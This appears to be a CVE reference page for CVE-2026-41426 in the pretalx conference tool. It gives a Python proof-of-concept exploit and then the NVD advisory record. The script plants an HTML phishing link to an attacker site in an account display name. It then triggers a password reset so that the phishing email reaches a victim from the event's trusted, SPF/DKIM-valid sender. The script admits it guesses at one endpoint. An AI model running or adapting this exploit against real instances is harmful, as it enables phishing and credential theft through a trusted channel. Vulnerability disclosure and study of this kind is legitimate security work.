CVE-2026-41426

# Proof of Concept for CVE-2026-41426 # This script demonstrates how an attacker might register a malicious account. import requests target_url = "http://target-pretalx-instance.com" # Malicious payload using HTML link syntax malicious_name = '<a href="http://attacker-controlled-site.com/phish">Reset Password</a>' # Attacker registers an account with the payload register_data = { "email": "[email protected]", "name": malicious_name, "password": "password123", "register": "register" } try: response = requests.post(f"{target_url}/orga/register/", data=register_data) if response.status_code == 200: print("[+] Malicious account registered successfully.") print("[+] Attacker now triggers password reset for victim's email.") # Trigger password reset for victim reset_data = { "email": "[email protected]" } # Assuming there is a reset endpoint reset_response = requests.post(f"{target_url}/orga/reset/", data=reset_data) print("[+] Password reset triggered. Check victim's email for the phishing link.") else: print("[-] Registration failed.") except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-41426", "sourceIdentifier": "[email protected]", "published": "2026-04-24T20:16:27.247", "lastModified": "2026-04-28T18:17:40.467", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pretalx is a conference planning tool. Prior to 2026.1.0, an unauthenticated attacker can send arbitrary HTML-rendered emails from a pretalx instance's configured sender address by embedding malformed HTML or markdown link syntax in a user-controlled template placeholder such as the account display name. The most direct vector is the password-reset flow: the attacker registers an account with a malicious name, enters the victim's email address, and triggers a password reset. The resulting email is delivered from the event's legitimate sender address and passes SPF/DKIM/DMARC validation, making it a ready-made phishing vector. This vulnerability is fixed in 2026.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-116"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pretalx:pretalx:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026.1.0", "matchCriteriaId": "03EB5005-B230-44D1-ABC5-16C13DC4D187"}]}]}], "references": [{"url": "https://github.com/pretalx/pretalx/security/advisories/GHSA-jm8c-9f3j-4378", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}